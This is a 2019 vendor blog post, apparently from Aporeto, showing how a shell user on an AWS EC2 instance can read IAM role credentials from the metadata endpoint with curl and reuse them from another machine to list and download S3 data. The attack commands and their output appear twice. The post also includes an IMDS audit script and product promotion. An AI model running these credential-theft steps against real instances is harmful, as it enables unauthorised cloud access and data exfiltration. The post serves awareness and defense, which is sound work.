Are You Only 2 Commands Away From Credential Theft?

By: Mark Jimenez 12.03.2019

When using AWS, be careful when sharing access to EC2 instances that carry an IAM role with S3 access. Any shell user on such an instance can list Amazon Resource Names (ARNs) with a single AWS CLI call:

```
ubuntu@ip-172-31-24-185:~$ sudo snap install aws-cli --classic
aws-cli 1.16.266 from Amazon Web Services (aws✓) installed
ubuntu@ip-172-31-24-185:~$ aws ec2 describe-instances --region us-west-2 | grep arn
                        "Arn": "arn:aws:iam::860256608252:instance-profile/ec2InstanceProfile",
```

 

Once you have the instance-profile name from the ARN, a single `curl` to the metadata API from inside the instance returns the session access key, secret key and token.

```
ubuntu@ip-172-31-24-185:~$ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2InstanceProfile
{
  "Code" : "Success",
  "LastUpdated" : "2019-11-04T18:32:57Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA4QS2KD76MYWH…",
  "SecretAccessKey" : "gc9FqDmkRlVi3oYLzOqhgytFAVkm/5XECgZ…",
  "Token" : "AgoJb3JpZ2luX2VjEDMaCXVzLX…
```

With the keys and token, from any machine on the internet, you can get the same level of access that was in the EC2 instance, including any available access to instances or S3 buckets.

Setup

```
$ export AWS_ACCESS_KEY_ID=<FROM ABOVE>
$ export AWS_SECRET_ACCESS_KEY=<FROM ABOVE>
$ export AWS_SESSION_TOKEN=<FROM ABOVE>
```

Do bad stuff

```
$ aws ec2 describe-instances --region us-west-1

markj@ubuntu:~/disk2/lbtest3/uclient1$ aws s3 ls
2019-11-01 16:59:09 markjs3
markj@ubuntu:~/disk2/lbtest3/uclient1$ aws s3 ls markjs3
                        PRE secretstuff/
markj@ubuntu:~/disk2/s3test$ mkdir test
markj@ubuntu:~/disk2/s3test$ aws s3 sync s3://markjs3 ./test
download: s3://markjs3/secretstuff/mysecret.txt to test/secretstuff/mysecret.txt
```

 

The AWS instance metadata service makes shared access to cloud resources easy. But for enterprises that have not protected themselves from unintended access, any person or any code on that machine can easily do what was never intended: exfiltrate the cloud credentials and use them to reach those same cloud resources from anywhere. The moment you share your machine beyond just yourself, you are potentially opening yourself up to the theft of cloud credentials and precious enterprise data.
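Before relying on any per-user control, it helps to know which instances in an account still answer the unauthenticated GET shown above. The Python script below is an added example written for this page; it is not Aporeto's tooling and does not come from the original post. It parses the JSON that `aws ec2 describe-instances` prints (the same command used above) and flags every instance that has an instance profile attached and whose `MetadataOptions` still allow IMDSv1 (`HttpTokens` other than `required`) or a PUT-response hop limit above 1. The embedded sample response is constructed: the instance IDs are made up and the metadata settings are chosen to exercise each branch; only the instance-profile ARN is the one shown in the post.

```python
"""Audit `aws ec2 describe-instances` output for instances whose role
credentials are still readable with a plain GET to 169.254.169.254."""
from __future__ import annotations

import json
import sys
from typing import Any

# Constructed sample shaped like `aws ec2 describe-instances` output.
# Instance IDs and MetadataOptions values are made up for this example;
# the instance-profile ARN is the one shown in the post.
PROFILE_ARN = "arn:aws:iam::860256608252:instance-profile/ec2InstanceProfile"
SAMPLE_DESCRIBE_INSTANCES = json.dumps({"Reservations": [{"Instances": [
    {"InstanceId": "i-0aaa1111aaaa1111a",  # role attached, IMDSv1 still allowed
     "IamInstanceProfile": {"Arn": PROFILE_ARN},
     "MetadataOptions": {"State": "applied", "HttpTokens": "optional",
                         "HttpPutResponseHopLimit": 1, "HttpEndpoint": "enabled"}},
    {"InstanceId": "i-0bbb2222bbbb2222b",  # tokens required, but hop limit reaches containers
     "IamInstanceProfile": {"Arn": PROFILE_ARN},
     "MetadataOptions": {"State": "applied", "HttpTokens": "required",
                         "HttpPutResponseHopLimit": 2, "HttpEndpoint": "enabled"}},
    {"InstanceId": "i-0ccc3333cccc3333c",  # no role: the curl in the post returns nothing
     "MetadataOptions": {"State": "applied", "HttpTokens": "optional",
                         "HttpPutResponseHopLimit": 1, "HttpEndpoint": "enabled"}},
    {"InstanceId": "i-0ddd4444dddd4444d",  # metadata endpoint disabled entirely
     "IamInstanceProfile": {"Arn": PROFILE_ARN},
     "MetadataOptions": {"State": "applied", "HttpTokens": "required",
                         "HttpPutResponseHopLimit": 1, "HttpEndpoint": "disabled"}},
]}]})


def audit_metadata_exposure(describe_instances_json: str) -> list[dict[str, Any]]:
    """Return one finding per instance that exposes role credentials through IMDS."""
    findings: list[dict[str, Any]] = []
    for reservation in json.loads(describe_instances_json).get("Reservations", []):
        for inst in reservation.get("Instances", []):
            role_arn = inst.get("IamInstanceProfile", {}).get("Arn")
            opts = inst.get("MetadataOptions", {})
            if role_arn is None or opts.get("HttpEndpoint", "enabled") == "disabled":
                continue  # nothing to steal, or no endpoint to ask
            reasons = []
            if opts.get("HttpTokens", "optional") != "required":
                reasons.append("IMDSv1 allowed: credentials readable with an unauthenticated GET")
            if int(opts.get("HttpPutResponseHopLimit", 1)) > 1:
                reasons.append("hop limit > 1: containers behind a bridge on the host can obtain a session token")
            if reasons:
                findings.append({"InstanceId": inst["InstanceId"], "Role": role_arn, "Reasons": reasons})
    return findings


def remediation_command(instance_id: str, region: str) -> list[str]:
    """argv for the AWS CLI call that enforces session tokens and a 1-hop limit."""
    return ["aws", "ec2", "modify-instance-metadata-options",
            "--region", region, "--instance-id", instance_id,
            "--http-tokens", "required", "--http-endpoint", "enabled",
            "--http-put-response-hop-limit", "1"]


def main() -> int:
    # Read real output when piped in; otherwise audit the constructed sample.
    raw = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE_DESCRIBE_INSTANCES
    findings = audit_metadata_exposure(raw)
    for f in findings:
        print(f"{f['InstanceId']} ({f['Role']})")
        for reason in f["Reasons"]:
            print(f"  - {reason}")
        print("  fix:", " ".join(remediation_command(f["InstanceId"], "us-west-2")))
    return 1 if findings else 0


if __name__ == "__main__":
    sys.exit(main())
```

Run it as `aws ec2 describe-instances --region us-west-2 | python3 imds_audit.py` (the file name is arbitrary); the non-zero exit status makes it usable as a CI or cron check. With `HttpTokens` set to `required`, the GET in the post gets a 401 instead of credentials, because a caller must first obtain a token with a PUT, and a hop limit of 1 keeps that PUT response from crossing a container bridge or NAT boundary on the host, which is why the script treats a larger value as a finding.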

 

To avoid this particular threat, Aporeto can control the access to the AWS metadata API based on the identity of the user.

 

Aporeto gives the security architect granular, multi-cloud visualization and control in identifying users and applications and locking down what they can access.  It enables control of user SSH access based on universal identity provider metadata instead of managing SSH keys. For all users and services in the EC2 instance, Aporeto also allows you to monitor and control operating system and network access.

 

The cloud will help you reach everyone, everywhere.  Automated access control from Aporeto allows you to keep doing that, anywhere, dynamically – and most importantly, securely.

 

For more information on how Aporeto can help protect your cloud presence, check out our latest Cloud PAM video. Read our Beyond SSH PAM with Aporeto Solution Brief and our Cloud PAM Product Brief. And check out our Cloud PAM webpage.

 

Detail

Given an IAM role with S3 access…

Assume shell access to the VM, obtained by any means.

List ARNs

```
ubuntu@ip-172-31-21-138:~$ aws ec2 describe-instances --region us-west-1 | grep arn
                     "Arn": "arn:aws:iam::860256608252:instance-profile/ec2InstanceProfile",
```

Use the ARN to get credentials

```
ubuntu@ip-172-31-21-138:~$ curl http://169.254.169.254/latest/meta-data/iam/security-credentials/ec2InstanceProfile
{
  "Code" : "Success",
  "LastUpdated" : "2019-11-02T00:21:33Z",
  "Type" : "AWS-HMAC",
  "AccessKeyId" : "ASIA4QS2KD76…",
  "SecretAccessKey" : "3CSUusT4CT+jB3Jtn3pGyH…",
  "Token" : "IQoJb3JpZ2luX2VjEPH//////////wEaCXVzLXdlc3QtMSJHMEUCIQCdeGRUZmfkS…",
  "Expiration" : "2019-11-02T06:56:39Z"
}
```

Then, from somewhere else, use them to steal data or do whatever else the role allows.

Setup

```
$ export AWS_ACCESS_KEY_ID=<FROM ABOVE>
$ export AWS_SECRET_ACCESS_KEY=<FROM ABOVE>
$ export AWS_SESSION_TOKEN=<FROM ABOVE>
```

Do bad stuff

```
$ aws ec2 describe-instances --region us-west-1

markj@ubuntu:~/disk2/lbtest3/uclient1$ aws s3 ls
2019-11-01 16:59:09 markjs3
markj@ubuntu:~/disk2/lbtest3/uclient1$ aws s3 ls markjs3
                        PRE secretstuff/
markj@ubuntu:~/disk2/s3test$ mkdir test
markj@ubuntu:~/disk2/s3test$ aws s3 sync s3://markjs3 ./test
download: s3://markjs3/secretstuff/mysecret.txt to test/secretstuff/mysecret.txt
```
